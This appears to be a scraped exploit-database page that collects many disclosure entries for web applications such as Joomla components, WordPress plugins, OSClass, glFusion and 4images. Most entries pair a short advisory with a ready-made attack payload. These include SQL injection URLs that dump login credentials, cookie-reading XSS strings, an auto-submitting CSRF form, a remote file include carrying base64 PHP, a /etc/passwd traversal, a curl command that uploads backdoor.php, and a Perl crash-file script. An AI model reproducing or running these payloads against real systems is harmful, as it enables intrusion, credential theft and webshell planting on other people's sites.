HireHackking

source: https://www.securityfocus.com/bid/51653/info Ultimate Locator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/locator/results_list.php?order=id&pageno=2&showsurrounding=1&zip=94102&zipsearch=Go&radius=-50 UNION ALL SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password) FROM login--

source: https://www.securityfocus.com/bid/51650/info glFusion is prone to multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data. Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. glFusion 1.2.2 is vulnerable; other versions may also be affected. http://www.example.com/[path]/profiles.php?sid=-1+UNION+SELECT+1,2,3,4,5,version(),NULL,6-- http://www.example.com/[path]/article.php?story='1 AND 2=-1 UNION SELECT 1,2,3,4,5,version(),NULL,6--

source: https://www.securityfocus.com/bid/51649/info YouSayToo auto-publishing for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. YouSayToo auto-publishing 1.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=[xss]

source: https://www.securityfocus.com/bid/51652/info UltraPlayer is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash the affected application, denying service to legitimate users. UltraPlayer 2.112 is vulnerable; other versions may also be affected. #!/usr/bin/perl sub logo { print STDERR << "EOF"; 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 EOF } #### # Title : UltraPlayer v2.112 (.avi) Local Crash p0c Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com # Facebook : http://facebook.com/KedAns # platform : windows ( Dos/p0c ) # Type : local exploit / p0c 4 Crash !! ##### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h | # | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. | # | ------------------------------------------------- < | ### logo(); sleep(2); my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; open (FILE,">> KedAns.avi"); # Bad File Here print FILE $PoC; close (FILE); # sP^tHanX & Gr33tZ t0 : Omar (www.l3b-r1z.com) | And My fr!ndS 0n HMD ^___^ <3 <3 #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n # Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X # Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX # www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs .. #=================================================================================================

source: https://www.securityfocus.com/bid/51657/info The 'com_jesubmit' component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. http://www.example.com/index.php?option=com_jesubmit&view=jesubmit&Itemid=[id]&lang=en

source: https://www.securityfocus.com/bid/51662/info OSClass is prone to SQL-injection and cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OSClass 2.3.3 is vulnerable; other versions may also be affected. http://www.example.com/index.php?page=search&sCity=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scrip t%3E http://www.example.com/index.php?page=search&sPattern=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E http://www.example.com/index.php?page=search&sPriceMax=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E http://www.example.com/index.php?page=search&sPriceMin=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E

source: https://www.securityfocus.com/bid/51672/info vBadvanced CMPS is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to execute arbitrary local and remote scripts in the context of the affected application or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible. vBadvanced CMPS 3.2.2 is vulnerable; other versions may also be affected. http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4= http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:pass@127.0.0.1/123.txt

source: https://www.securityfocus.com/bid/51671/info DClassifieds is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible. DClassifieds 0.1 final is vulnerable; other versions may also be affected. <form action="http://www.example.com/admin/settings/update/id/4" method="post"> <input type="hidden" name="Settings[setting_name]" value="CONTACT_EMAIL"> <input type="hidden" name="Settings[setting_value]" value="hacker@mail.com"> <input type="hidden" name="Settings[setting_description]" value="Contact email"> <input type="hidden" name="Settings[setting_show_in_admin]" value="1"> <input type="hidden" name="yt0" value="Save"> <input type="submit" id="btn"> </form> <script> document.getElementById('btn').click(); </script>

source: https://www.securityfocus.com/bid/51662/info OSClass is prone to SQL-injection and cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OSClass 2.3.3 is vulnerable; other versions may also be affected. http://www.example.com/index.php?page=search&sCategory[]=0%27%20OR%20%28SELECT%20MID%28version%28%29,1,1% 29%29=5%29%20d%20--%202

source: https://www.securityfocus.com/bid/51673/info The 'com_motor' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_motor&controller=motor&task=edit&cid[0]=[SQL Injection]

source: https://www.securityfocus.com/bid/51699/info xClick Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. xClick Cart versions 1.0.1 and 1.0.2 are affected; other versions may also be vulnerable. http://www.example.com/pages/cart/webscr.php?cmd=_cart&ew=1&item_name=Scrimshaw+Kit&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

source: https://www.securityfocus.com/bid/51710/info Wireshark is prone to a buffer-underflow vulnerability and multiple denial-of-service vulnerabilities. Remote attackers can exploit these issues to execute arbitrary code in the context of the application or cause denial-of-service conditions. Wireshark versions 1.4.0 through 1.4.10 and 1.6.0 through 1.6.4 are vulnerable. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36633.zip

source: https://www.securityfocus.com/bid/51678/info Slideshow Gallery for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=586&height=586&border='"--></style></script><script>Pwned by brethawk(0x000178)</script>

source: https://www.securityfocus.com/bid/51674/info The 'com_products' component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_products&task=category&catid=[SQL Injection] http://www.example.com/index.php?option=com_products&id=[SQL Injection] http://www.example.com/index.php?option=com_products&catid=[SQL Injection] http://www.example.com/index.php?option=com_products&product_id=[SQL Injection] http://www.example.com/index.php?option=com_products&task=detail&parent_id=[SQL Injection] http://www.example.com/index.php?option=com_products&task=edit_productdetail&id_pro=[SQL Injection] http://www.example.com/index.php?option=com_products&Itemid=53&controller=home&task=displayitem&itemcode=[SQL Injection] http://www.example.com/index.php?option=com_products&catid=1&Cat[]=[SQL Injection] http://www.example.com/index.php?option=com_products&cid=[SQL Injection] http://www.example.com/index.php?option=com_products&view=products&id=19&cat=[SQL Injection] http://www.example.com/index.php?option=com_products&task=product&pid=[SQL Injection] http://www.example.com/index.php?option=com_products&Itemid=[SQL Injection]

source: https://www.securityfocus.com/bid/51726/info The 'com_visa' component for Joomla! is prone to a local file-include vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the affected application. Information harvested may aid in further attacks. The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. http://www.example.com/index.php?option=com_visa&controller=../../../../../../../../../../../../../etc/passwd%00 http://www.example.com/index.php?option=com_visa&view=book&id=23' + [SQL Injection] http:/www.example.com/index.php?option=com_visa&Itemid=35&page=4' + [SQL Injection]

source: https://www.securityfocus.com/bid/51729/info The 'com_propertylab' component for Joomla! is prone to a remote SQL injection vulnerability. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_propertylab&task=showproperty&id=[SQLinjection]

source: https://www.securityfocus.com/bid/51728/info The 'com_crhotels' component for Joomla! is prone to a remote SQL injection vulnerability. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_crhotels&view=cate&catid=[SQL Injection]

source: https://www.securityfocus.com/bid/51727/info The 'com_firmy' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_firmy&task=section_show_set&Id=[SQLinjection]

# Exploit Title: *u-Auctions Multiple Vulnerabilities* # Google Dork: "*Powered by u-Auctions** ©*" # Date: *03 April 2015* # Exploit Author: *Don* # Vendor Homepage: https://www.*u-auctions.com <http://u-auctions.com>*/ # Version: *ALL* # Tested on: *Debian* *1. Blind SQL injection*: This vulnerability affects */adsearch.php* URL encoded POST input *category* was set to *(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/* *POC:* *http://www <http://www>.targetsite.com <http://targetsite.com>/adsearch.php=action=search&buyitnow=y&buyitnowonly=y&category=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&closed=y&country=Afghanistan&csrftoken=59b61458fbbb4d6d44a4880717a3350a&desc=y&ending=1&go=GO%20%3E%3E&maxprice=1&minprice=1&payment%5b%5d=paypal&seller=1&SortProperty=ends&title=Mr.&type=2&zipcode=94102* *Done* *+-------------------------------------------------------------------------------------------------------------------------------------+* *2. HTTP parameter pollution* This vulnerability affects /*feedback.php* URL encoded GET input *id* was set to *1&n903553=v972172* Parameter precedence: *last occurrence* Affected parameter: *user_id=1* The impact depends on the affected web application. *An attacker could*: *1* = Override existing hardcoded HTTP parameters *2* = Modify the application behaviors *3* = Access and, potentially exploit, uncontrollable variables *4* = Bypass input validation checkpoints and WAFs rules POC: *http://www <http://www>.targetsite.com <http://targetsite.com>/feedback.php?faction=show&id=1%26n903553%3dv972172* *Done* *+-------------------------------------------------------------------------------------------------------------------------------------+* *There is XSS too but I don't see it useful for anything, so will skip it.* *Cheers folks, Don (Balcan Crew) is back! :)* *Have fun and have friends!* *Shouts to my good friends from past / whoever is online / this website and new kids from the localhost.* *~Don 2015*

###################### # Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip # Date : 2015-03-14 # Tested on : Linux BackBox 4.0 / curl 7.35.0 ###################### # Description: Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving. This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow. ###################### # Location : http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php ###################### # PoC: curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php # Backdoor Location: http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php ###################### # Vulnerability Disclosure Timeline: 2015-03-14: Discovered vulnerability 2015-04-03: Vendor Notification 2015-04-03: Vendor Response/Feedback 2015-04-04: Vendor Fix/Patch (2.5.3) 2014-04-04: Public Disclosure ##################### Discovered By : Claudio Viviani http://www.homelab.it http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww #####################

source: https://www.securityfocus.com/bid/51779/info The 'com_cmotour' component for Joomla! is prone to an SQL injection vulnerability. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?index.php?option=com_cmotour&task=cat&Itemid=xxx&id=[SQL Injection]

source: https://www.securityfocus.com/bid/51730/info The 'com_bbs' component for Joomla! is prone to multiple remote SQL-injection vulnerabilities. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_bbs&bid=[SQLi] http://www.example.com/index.php?option=com_bbs&task=list&bid=[SQLi] http://www.example.com/index.php?option=com_bbs&Itemid=xxx&task=search&search_type=[SQLi]

source: https://www.securityfocus.com/bid/51774/info 4images is prone to multiple input-validation vulnerabilities including: 1. A cross-site scripting vulnerability. 2. An open-redirection vulnerability. 3. An SQL-injection vulnerability. An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 4images 1.7.10 is vulnerable; other versions may also be affected. http://www.example.com/admin/categories.php?action=addcat&cat_parent_id=1 (XSS)

source: https://www.securityfocus.com/bid/51774/info 4images is prone to multiple input-validation vulnerabilities including: 1. A cross-site scripting vulnerability. 2. An open-redirection vulnerability. 3. An SQL-injection vulnerability. An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 4images 1.7.10 is vulnerable; other versions may also be affected. http://www.example.com/admin/index.php?__csrf=931086345abbb83f9a70c87dc4719248& action=login&redirect=http://google.com&loginusername=admin&loginpassword=pass

source: https://www.securityfocus.com/bid/51774/info 4images is prone to multiple input-validation vulnerabilities including: 1. A cross-site scripting vulnerability. 2. An open-redirection vulnerability. 3. An SQL-injection vulnerability. An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 4images 1.7.10 is vulnerable; other versions may also be affected. http://www.example.com/admin/categories.php?action=addcat&cat_parent_id=1' (SQL Injection)